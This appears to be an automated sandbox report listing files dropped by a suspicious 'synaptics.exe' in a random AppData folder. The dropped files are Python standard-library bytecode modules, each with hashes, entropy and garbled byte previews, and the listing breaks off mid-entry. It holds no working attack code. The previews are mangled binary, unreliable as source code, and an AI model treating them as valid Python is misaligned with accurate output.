                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s@...d.Z.d.d.l.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z=.The objects used by the site module to add custom builtins.......Nc....................@...s&...e.Z.d.Z.d.d...Z.d.d...Z.d.d.d...Z.d.S.)...Quitterc....................C...s....|.|._.|.|._.d.S...N....name..eof)...selfr....r......r.....<C:\Users\user\AppData\Local\xFSOj9El1Q\lib\_sitebuiltins.py..__init__....s........z.Quitter.__init__c....................C...s....d.|.j.|.j.f...S.).Nz.Use %s() or %s to exitr......r....r....r....r......__repr__....s......z.Quitter.__repr__Nc....................C...s&...z.t.j.......W.t.|...........Y.t.|.....r....)...sys..stdin..close..SystemExit).r......coder....r....r......__call__....s................z.Quitter.__call__r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s6...e.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._Printerzninteractive prompt objec
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7632
                                                                                                                                                                                                            Entropy (8bit):4.613900755667279
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:no0AmOjav3ze0qLnKFHWpLiEEskjXoNizml+Ws2w13TvqcJlnqJEqBTgztqetKHs:o0Abj236LTKF2pLiE3kjXoEzml+Ws2wV
                                                                                                                                                                                                            MD5:128562100C3C9CCB9A7354181B639061
                                                                                                                                                                                                            SHA1:E3707FDB3A84E42EC30193E3D4884C50B241A510
                                                                                                                                                                                                            SHA-256:E4B9B4E31273BCD556E7F26A87D565C35A110B4C314992E7D5DCDA4DB6FDE510
                                                                                                                                                                                                            SHA-512:93DADB9BCF97D9B7061993404B26895C9D4546B14FCD4BC215EE75A9DE056A9D33169CB8BB11167C00D61FF47911823DB0EC0614FC8C7B89AA14366665B4706A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s>...d.d.l.m.Z...d.d.l.m.Z...d.g.Z.G.d.d...d...Z.G.d.d...d...Z.d.S.)..........ref)...GenericAlias..WeakSetc....................@...s$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._IterationGuardc....................C...s....t.|...|._.d.S...N).r......weakcontainer)...selfr......r.....:C:\Users\user\AppData\Local\xFSOj9El1Q\lib\_weakrefset.py..__init__....s......z._IterationGuard.__init__c....................C...s ...|.....}.|.d.u.r.|.j...|.....|.S.r....).r......_iterating..add).r......wr....r....r......__enter__....s............z._IterationGuard.__enter__c....................C...s8...|.....}.|.d.u.r.|.j.}.|...|.....|.s.|.......d.S.d.S.d.S.r....).r....r......remove.._commit_removals).r......e..t..br......sr....r....r......__exit__....s....................z._IterationGuard.__exit__N)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s&...e.Z.d.Z.d@d.d...Z.d.d...Z.d.d...Z.d.d...Z
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6775
                                                                                                                                                                                                            Entropy (8bit):5.127887113090687
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Jc2+dPAp6MGWUls1p2N8R6Diag2z9o2Ue4loXLk5ebUtoH:m2+dP1MGxYtag2VXLk5ewc
                                                                                                                                                                                                            MD5:2A61EA4FF0003F9487D2E6AC9F6C7924
                                                                                                                                                                                                            SHA1:35D69A830E44C11599EE9E61034B08DE37A52D4D
                                                                                                                                                                                                            SHA-256:12F7C7A896FCC8B90F20B325601F7F03FD72035CBC02431C9BF96D85DFCCC06D
                                                                                                                                                                                                            SHA-512:64D5D1B960B1C5D0539EAC7F32E136F092545BA073A067D43D810ABF9FA84786D48D17BBC82ED451F12A37C08D4477FED07E96A80FD5DFC2E5913D5D0A3AD8A9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d6........................@...s....d.Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...W.n...e.yH......d.d.l.m.Z.m.Z...d.e._.Y.n.w.G.d.d...d.e...Z.d.d...Z.G.d.d...d.e.d...Z.d.S.).z3Abstract Base Classes (ABCs) according to PEP 3119.c....................C...s....d.|._.|.S.).a<...A decorator indicating abstract methods... Requires that the metaclass is ABCMeta or derived from it. A. class that has a metaclass derived from ABCMeta cannot be. instantiated unless all of its abstract methods are overridden.. The abstract methods can be called using any of the normal. 'super' call mechanisms. abstractmethod() may be used to declare. abstract methods for properties and descriptors... Usage:.. class C(metaclass=ABCMeta):. @abstractmethod. def my_abstract_method(self, ...):. .... T)...__isabstractmethod__).Z.funcobj..r.....2C:\Users\user\AppData\Local\xFSOj9El1Q\lib
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):55763
                                                                                                                                                                                                            Entropy (8bit):5.2786121481233685
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:a4tQGlgD7U5M0gB2ze0GIHimylhWNbflS8rHKMAsSbUgUU0/9eKQddNhvDqIUy7w:a4+GlgD7U54B2XNHehW7uVvuIlPgj
                                                                                                                                                                                                            MD5:EC106ABC857B05EF274E8244F201EBE6
                                                                                                                                                                                                            SHA1:2220B6EF5A8095397BF92018CBA5E4D3864D714C
                                                                                                                                                                                                            SHA-256:E1EC0371A54EFC8B39257EE1BCF2EED9F8D3564CCD843234D781E7AE2C5B4B87
                                                                                                                                                                                                            SHA-512:F7D45635B497DE0DA8F80A52C5C6230B8E57A407CE30D5C26662FD9B1F5725E20F1597CD5F963CAC2F919C423D5475376588062D5BB0AD8DB08496B6BD2A6594
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d`d.d.d...d.d...Z.d.d...Z.dad.d...d.d...Z.d.d...Z.d.d...Z.dbd.d...Z.d.d...Z.d.d...Z.dcd.d...Z.d.d ..Z.d!d"..Z.d.d#..d$d%..Z.d&d'..Z.G.d(d)..d)e...Z.G.d*d+..d+e...Z.e.e.d,..s.d-d...Z.d/d0..Z.e.e.e...e._.e.e.e...e._.G.d1d2..d2e ..Z!d3d4..Z"G.d5d6..d6e.e!d7..Z#G.d8d9..d9e.e!d7..Z$G.d:d;..d;e.e!d7..Z%G.d<d=..d=e.e!d7..Z&G.d>d?..d?e.e!d7..Z'e#e(e)e*f.e$e+f.e%e,f.e&e d...e-f.e'e d@..f.i.Z.e#e-f.i.Z/e-d=e d...d=e(d6e)d6e*d6e+d9e,d;e d@..d?i.Z0G.dAdB..dBe1..Z2G.dCdD..dDe2..Z3G.dEdF..dFe2..Z4e.e5dG....s"dHdI..Z6dJdK..Z7e.e6e7..e5_8G.dLdM..dMe9..Z:G.dNdO..dOe;..Z<G.dPdQ..dQe;..Z=G.dRdS..dSe;..Z>dTe?e.j@jAd.......ZBG.dUdV..dVe...ZCdWZDdXZEg.eD..eE..R.ZFG.dYdZ..dZe...ZGd[d\..ZHd]d^..ZIeJd_k...ryeI....d.S.d.S.)daH.... ast. ~~~.. The `ast` module helps Python applications to process trees of the Python. abstract syntax grammar. The abstract syntax itself might change with. each Python re
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17186
                                                                                                                                                                                                            Entropy (8bit):5.496639246898952
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:1ZvQ11ayn9wBqXY71hITEOtuAk8CUSSYkXJ20RQa83hg9M6o0RzuQcT/zlNaf63V:Xgay9wgo71hITOtHYP9M70xuzRNi63V3
                                                                                                                                                                                                            MD5:926C8F516423723E4FB6E8C6A5B968C4
                                                                                                                                                                                                            SHA1:5F32927A380B1D84BA92AD123C4BD76AB144812A
                                                                                                                                                                                                            SHA-256:4F1665814F3C5D7160753B856E753D8286B8F658B91F9B18FDA7D03377C07885
                                                                                                                                                                                                            SHA-512:007D447B024EE0B82406F951879CC005453D4A98E27E3EEC7516A15ABF2F5995175B393551C05B1F86E9961AECC275FFBB685B1E566B3ECE9E066AD3DDED9AAA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.S.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.e.e.f.Z.d.d...Z.dQd.d...Z.dRd.d...Z.d.d...Z.d.d...Z.e...d.d...Z.e...d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.a.i.a.d.d...Z.dSd.d...Z.d.d...Z.e.j.d d!..e._.dSd"d#..Z.e.j.d e.d$..e._.d%d&..Z.e.j.d'd!..e._.dTd(d)..Z.e.j.d'd*d$..e._.d+d,..Z dTd-d...Z!d.a"d.a#d/Z$d0Z%dUd1d2..Z&d.d.d.d.d3..d4d5..Z'd.d.d6d7..d8d9..Z(d:Z)d.a*d.a+d.a,dTd;d<..Z-d=d>..Z.d?Z/e/d@..dA..Z0dBdC..Z1dDdE..Z2dFdG..Z3dHdI..Z4dJdK..Z5dLdM..Z6dNdO..Z7e8dPk.r.e6....d.S.d.S.)VzDBase16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings.....N)...encode..decode..encodebytes..decodebytes..b64encode..b64decode..b32encode..b32decode..b32hexencode..b32hexdecode..b16encode..b16decode..b85encode..b85decode..a85encode..a85decode..standard_b64encode..standard_b64decode..urlsafe_b64encode..urlsafe_b64decodec....................C...sl...t.|.t...r.z.|...d...W.S...t.y.......t.d.....w.t.|.t...r.|.S.z.t.|.......W.S...t.y5......t.d.|.j.j.....d...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2612
                                                                                                                                                                                                            Entropy (8bit):5.223716360147751
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lqChwHaPJ7Bn7V3wiCEOCl7VU3OpOBn7B3wCLnCRl7VC39eV:sCh7Bx3wlEOC03OpOB93wGCRi34V
                                                                                                                                                                                                            MD5:A6D5EE7D36A2E1BA05744A57FA33023E
                                                                                                                                                                                                            SHA1:CBA8F19581D70CDC6E3633C5B165AD2A0435A2AC
                                                                                                                                                                                                            SHA-256:46002862324D0541230EA7880A5788B25874BCBF838A9DC3D05DBEB46B055033
                                                                                                                                                                                                            SHA-512:F3879D4724B7059D90FD56534306B0DACFE5CB143CA7B46332890DAB916F846ABADDABC7E0DD236CA8AA62946F71AB50B84AC2C3F64F2BCEFF62361A193E5177
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sp...d.Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.z.d.d.l.T.W.n...e.y1......Y.n.w.e.Z.e.Z.d.S.).z.Bisection algorithms......N....keyc....................C....>...|.d.u.r.t.|.|.|.|...}.n.t.|.|.|...|.|.|.d...}.|...|.|.....d.S.).z.Insert item x in list a, and keep it sorted assuming a is sorted... If x is already in a, insert it to the right of the rightmost x... Optional args lo (default 0) and hi (default len(a)) bound the. slice of a to be searched.. Nr....)...bisect_right..insert....a..x..lo..hir......r.....5C:\Users\user\AppData\Local\xFSOj9El1Q\lib\bisect.py..insort_right....s............r....c....................C...s....|.d.k.r.t.d.....|.d.u.r.t.|...}.|.d.u.r1|.|.k.r/|.|...d...}.|.|.|...k.r'|.}.n.|.d...}.|.|.k.s.|.S.|.|.k.rN|.|...d...}.|.|.|.|.....k.rF|.}.n.|.d...}.|.|.k.s5|.S.).a....Return the index where to insert item x in list a, assuming a is sorted... The return value i is such that all e in a[:i
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10894
                                                                                                                                                                                                            Entropy (8bit):5.274354076763479
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:h6Eb2RLPRaQHzW6FVoDCGEUPIzSh/NHSN:uRLPRLpGPIzG/NyN
                                                                                                                                                                                                            MD5:DE6D25F1E1909368BCF696475970C71D
                                                                                                                                                                                                            SHA1:4ABD627BF28F2F65EC312AFA651233B7F53888BF
                                                                                                                                                                                                            SHA-256:C863B8F2C8CD4F608BA271BD69A97CA42ED155CBC74808B684CC2E36F592D771
                                                                                                                                                                                                            SHA-512:3EC8A80185459424FF6181CC98F8E38A2E0B136AC8B932BF518FAC89590CE5BE24F2D44EB5B23CD6352D53640B71B3AD423B4CC2314DE73FCCA8E26379B0EAAC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d./.......................@...s....d.Z.g.d...Z.d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.....d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z.Interface to the libbzip2 compression library...This module provides a file interface, classes for incremental.(de)compression, and functions for one-shot (de)compression..)...BZ2File..BZ2Compressor..BZ2Decompressor..open..compress..decompressz%Nadeem Vawda <nadeem.vawda@gmail.com>.....).r....N).r....r..............c....................@...s....e.Z.d.Z.d.Z.d*d.d...d.d...Z.d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d+d.d...Z.d,d.d...Z.d,d.d...Z.d.d...Z.d,d.d...Z.d,d.d ..Z.d!d"..Z.d#d$..Z.e.j.f.d%d&..Z.d'd(..Z.d)S.)-r....a@...A file object providing transparent bzip2 (de)compression... A BZ2File can act as a wrapper for an existing file object, or refer. directly to a named file on disk... Note that BZ2File provides a *binary* file interface - data read is. returned as bytes, and data t
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26327
                                                                                                                                                                                                            Entropy (8bit):5.232285193526222
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:jPfNsz3TQClly8bR9PS2qYRhWmBM2A9M/PNKGH:jdmHS2qgw29KGH
                                                                                                                                                                                                            MD5:C583F9B35B140A6498A27BF5436FBDEB
                                                                                                                                                                                                            SHA1:3A347C1AB150BEDB47EE61110732767A51E2BBC0
                                                                                                                                                                                                            SHA-256:8EBD3A68AFC54643ADAE8019937661320D347476416CD65C6110EDCBFAD53F5C
                                                                                                                                                                                                            SHA-512:6E4D7451741C8FCE88D0C03E491A35A71B1B93BA228D822403C7BD5B6B882D1424D1DF8F066A19ADED4E77A0FF1276C0CA2A5154CA76E2C892B9A692DBC514A8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.b.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.e.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.Z.d.Z.g.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...\.Z.Z.Z.Z.Z.Z.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z d.d...Z!d.d ..Z"d!d"..Z#G.d#d$..d$e$..Z%G.d%d&..d&e%..Z&G.d'd(..d(e%..Z'G.d)d*..d*..Z(G.d+d,..d,e&..Z)G.d-d...d.e'..Z*e&..Z+e+j,Z-d/d0..Z.e+j/Z0e+j1Z1e+j2Z3e+j4Z5e+j6Z6e+j7Z8e+j9Z:e+j;Z<d1Z=d2Z>e=e>f.d3d4..Z?e=e>f.d5d6..Z@d7ZAe..BeAd.d....C..ZDd8d9..ZEd:d;..ZFeGd<k.r.eFe.jH....d.S.d.S.)=a$...Calendar printing functions..Note when comparing these calendars to the ones printed by cal(1): By.default, these calendars have Monday as the first day of the week, and.Sunday as the last (the European convention). Use setfirstweekday() to.set the first day of the week (0=Monday, 6=Sunday)......N)...repeat)...IllegalMonthError..IllegalWeekdayError..setfirstweekday..firstweekday..isleap..leapdays..weekday..monthrange..monthcalendar..prmonth..m
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33243
                                                                                                                                                                                                            Entropy (8bit):5.022647650916181
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:2//o6wZxokNQceWYXgYD7msLySGRbmOZwENNflPKPBxKa:2RUkFrOZwENNflPKPBxKa
                                                                                                                                                                                                            MD5:00A359F12E85B5D39BD24216B4340233
                                                                                                                                                                                                            SHA1:ADEFA1ADF4B6DFA57776FE9C65EE430F10FCEFC0
                                                                                                                                                                                                            SHA-256:F51AC88BD45428531C7726DCC410DCE018FDDF9F4287900CD55829FFC85830CD
                                                                                                                                                                                                            SHA-512:84813755EDF1A104C5CC542A25C053E88E75DD022E0549FE544DDD0993AD90F5414E0135C5F4193BA687D49BF7F226EC79B1375268D8E790812EA84149EADEA8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.T.W.n...e.y"..Z...z.e.d.e.......d.Z.[.w.w.g.d...Z.d.Z.d...Z.Z.d...Z.Z.d.Z.d.Z.e.j.d.k.rAe...Z.Z.e.Z.n.e...Z.Z.e.Z.e.Z.e.Z.e.Z.e.Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z G.d.d...d...Z!G.d.d...d...Z"dCd#d$..Z#dDd%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(d/d0..Z)d1d2..Z*dEd3d4..Z+dEd5d6..Z,d7d8..Z-d9d:..Z.z.e/d!..Z0e/d;..Z1e/d<..Z2e/d=..Z3e/d>..Z4e/d?..Z5W.n...e6y.......d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5Y.n.w.d.Z7e7..r.d.d.l8Z8e9d@k...r e$e.j:dAdB..e._:e$e.j;dBdA..e._;d.S.d.S.)Fz. codecs -- Python Codec Registry, API and helpers....Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N)...*z%Failed to load the builtin codecs: %s),..register..lookup..open..EncodedFile..BOM..BOM_BE..BOM_LE..BOM32_BE..BOM32_LE..BOM64_BE..BOM64_LE..BOM_UTF8..BOM_UTF16..BOM_UTF16_LE..BOM_UTF16_BE..BOM_UTF32..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20919
                                                                                                                                                                                                            Entropy (8bit):5.0846250491331375
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:ArNHbNxImphzxb/Dqd89tiVqnWcxavd5VCqXfNnpJ:mNHbNxhzpqd2OqnWvQAFf
                                                                                                                                                                                                            MD5:EE39B4BF3864DC091AB9338A0402CF9C
                                                                                                                                                                                                            SHA1:4585569C9E955A238C66144C72071DCF2122646E
                                                                                                                                                                                                            SHA-256:989C8BF2E3312C5AA61EAF7983C43234140925D8B60919416A7B649DA534FF0A
                                                                                                                                                                                                            SHA-512:1525DFAF12D7BACA8F6BB61A91407A8AE5EA6A885C868586423A63A19B7D75FC1D54868EB1D6A82B31AD8E6CB049FBD4DB0D49F43756B02B42649EB615D34D72
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.h.......................@...s~...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e.e.e...Z.G.d.d...d.e.e.e...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.G.d!d"..d"e...Z.G.d#d$..d$e...Z.G.d%d&..d&..Z.G.d'd(..d(e.e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z d.S.)-z4Utilities for with-statement contexts. See PEP 343......N)...deque....wraps)...MethodType..GenericAlias)...asynccontextmanager..contextmanager..closing..nullcontext..AbstractContextManager..AbstractAsyncContextManager..AsyncExitStack..ContextDecorator..ExitStack..redirect_stdout..redirect_stderr..suppress..aclosingc....................@....:...e.Z.d.Z.d.Z.e.e...Z.d.d...Z.e.j.d.d.....Z.e.d.d.....Z.d.S.).r....z,An abstract base class for context managers.c....................C........|.S...z0Return `self` upon entering the runtime context.......selfr....r.....9C:
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7020
                                                                                                                                                                                                            Entropy (8bit):5.422704393572908
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:WxPakDZxS5GFVc3isTDOuyib91quyccWEQTidqf2hMQkNv4n5q:0a0/S5GncR/Iib9wEREkidQ2Ov4k
                                                                                                                                                                                                            MD5:0770017CDFA595D33FF04100C48B4DC3
                                                                                                                                                                                                            SHA1:2DD87295FDB9F5886EC247AA5E206A7129C1C770
                                                                                                                                                                                                            SHA-256:9DE1959CDA2A7D73FC5D73598CA28991F40E16F7F378E5157006629C3CAB3B27
                                                                                                                                                                                                            SHA-512:0A69D8B84FB8A3035C33D5800D7B3E3865F6361A1FB62BB1BAF26A4B4F6E429D25FE115791C74DE43BC4AEEE026B7E592950BC53E7B67EEA7DE2E94A6EE9EC9A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.#.......................@...sV...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e...Z.e.Z.z.d.d.l.m.Z...W.n...e.y-......d.Z.Y.n.w.g.d...Z.d.d...Z.i...Z.Z.d.d...Z.e.d...e.e.e.e.e.e.e.e.e.e.e.e.e.j.e.e...e.e...e.j.e.j f.D.].Z!e.e.e!<.q[e"e.d.d...Z!e!d.u.rpe.e.e!<.e#j.e.e#<.e$j.e.e$<.e%j.e.e%<.e&j.e.e&<.e.d.u.r.e.j.e.e.<.[.[!d.g.f.d.d...Z'i...Z(Z.d.d...Z)e)e.e.d...<.e)e.e.e...<.e)e.e.e...<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.j*<.e)e.e.<.e)e.e.<.e)e.e.j.<.e)e.e.j.<.e)e.e.j <.e)e.e.<.e'f.d.d...Z+e+e.e#<.e'f.d.d...Z,e,e.e.<.e'f.d.d...Z-e-e.e$<.e.d.u...r.e-e.e.<.d.d...Z.e.e.e.j/<.[.d.d...Z0..d.e'd...d.d...Z1[.[.[.d.S.).a....Generic (shallow and deep) copying operations...Interface summary:.. import copy.. x = copy.copy(y) # make a shallow copy of y. x = copy.deepcopy(y) # make a deep copy of y..For module specific errors, copy.Error is raised...The difference between shallow and deep copying is only relevant for.compound objects (object
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4707
                                                                                                                                                                                                            Entropy (8bit):5.306559259791873
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:cCI7QMLHGjZ79X1XBrxbbJz0uqhUaCWfqmb5p2LYHjmTrhqH3TpYXGP2:evHGZBrpb56eWfhqLYHjmTkH3TpY2P2
                                                                                                                                                                                                            MD5:2CE04B95F453B92F3588B375637EB6D3
                                                                                                                                                                                                            SHA1:D17A546BA952DC96354BACA7CFDF97CB1FAC1904
                                                                                                                                                                                                            SHA-256:A28D9335328383F1C554528293F45B454E363ADF6E2CAF8C9E1176741E85963E
                                                                                                                                                                                                            SHA-512:5943EFB85F3DDA856E02C675D530253CEB764522D324914D5B70352E1440440D295C1E472AA9911B6F242657ACE7115731240AA575ED517850BAD45C858FB200
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.g.d...Z.i.Z.d.d.d...Z.d.d...Z.z.e...W.n...e.y.......Y.n.w.d.d...Z.e.e.e.e.....d.d...Z.e.e.e.e.B...e.....d.d...Z.d.Z.e.e.j...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.i.Z.i.Z.i.Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z.Helper to provide extensibility for pickle...This is only useful to add pickle support for extension types defined in.C, not for instances of user-defined classes..)...pickle..constructor..add_extension..remove_extension..clear_extension_cacheNc....................C...s0...t.|...s.t.d.....|.t.|.<.|.d.u.r.t.|.....d.S.d.S.).Nz$reduction functions must be callable)...callable..TypeError..dispatch_tabler....).Z.ob_typeZ.pickle_functionZ.constructor_ob..r.....6C:\Users\user\AppData\Local\xFSOj9El1Q\lib\copyreg.pyr........s................r....c....................C...s....t.|...s.t.d.....d.S.).Nz.constructors must be callable).r....r....)...objectr....r....r....r........s..........r....c....................C...s....t.|.j.|.j.f.f.S...N)...comp
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11822
                                                                                                                                                                                                            Entropy (8bit):5.447210751768081
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:TJq1+BK5hSIQIWWvBMKumwKZdlXiWQA3LYPqOW9PJFoKzckOMsj9XCCDH:TJqrLSIQ2OKuuZrXiWQA0shzJaYWH
                                                                                                                                                                                                            MD5:AB772A6D5FF2ABDCA4C94E9640FD6F75
                                                                                                                                                                                                            SHA1:3C4EE25EF3372012AC50C18D412328B790C7A161
                                                                                                                                                                                                            SHA-256:2AEA7F1BC3670E7B07CE23C3A8E118F7443F82C58339B852DBBF457E9D8F9366
                                                                                                                                                                                                            SHA-512:BE678BA52D9F4EBDE54926E8848C74F09DB9C7BFABC0C040C047D4E8627AA9C1FE3E0192B234E729391A762845D520D13DFBEC36182F1AC9571886BB2B7AEF17
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,dZ@.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.e.d.e.....G.d.d...d.e...Z.e.d.e.....G.d.d...d.e...Z.e.d.e.....G.d.d...d...Z.G.d.d...d...Z.z.e...W.n...e.y.......e.Z.Y.n.w.G.d.d...d...Z.d.S.).z+.csv.py - read/write/investigate CSV files......N)...Error..__version__..writer..reader..register_dialect..unregister_dialect..get_dialect..list_dialects..field_size_limit..QUOTE_MINIMAL..QUOTE_ALL..QUOTE_NONNUMERIC..QUOTE_NONE..__doc__)...Dialect)...StringIO).r....r....r....r....r....r....r......excel..excel_tabr....r....r....r....r....r......Snifferr....r......DictReader..DictWriter..unix_dialectc....................@...sD...e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.).r....z.Describe a CSV dialect... This must be subclassed (see csv.excel). Valid attributes are:. delimiter, quotechar, escapechar, doublequote, skipinitialspace,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):56557
                                                                                                                                                                                                            Entropy (8bit):5.250163097473247
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:EoPudGbiwEyaNVxLZnkM238oZMpA635Kw9uUFoYH:EWc1LMP0
                                                                                                                                                                                                            MD5:1BA31A29B8174B415F86995A3BD857BE
                                                                                                                                                                                                            SHA1:49D04EB383F3FDDD0A795C30CA7AC58DBCE13865
                                                                                                                                                                                                            SHA-256:35F475FEE7CB964FB440FB46887BC42145FAC9EF7CF91F8A4509350A59414758
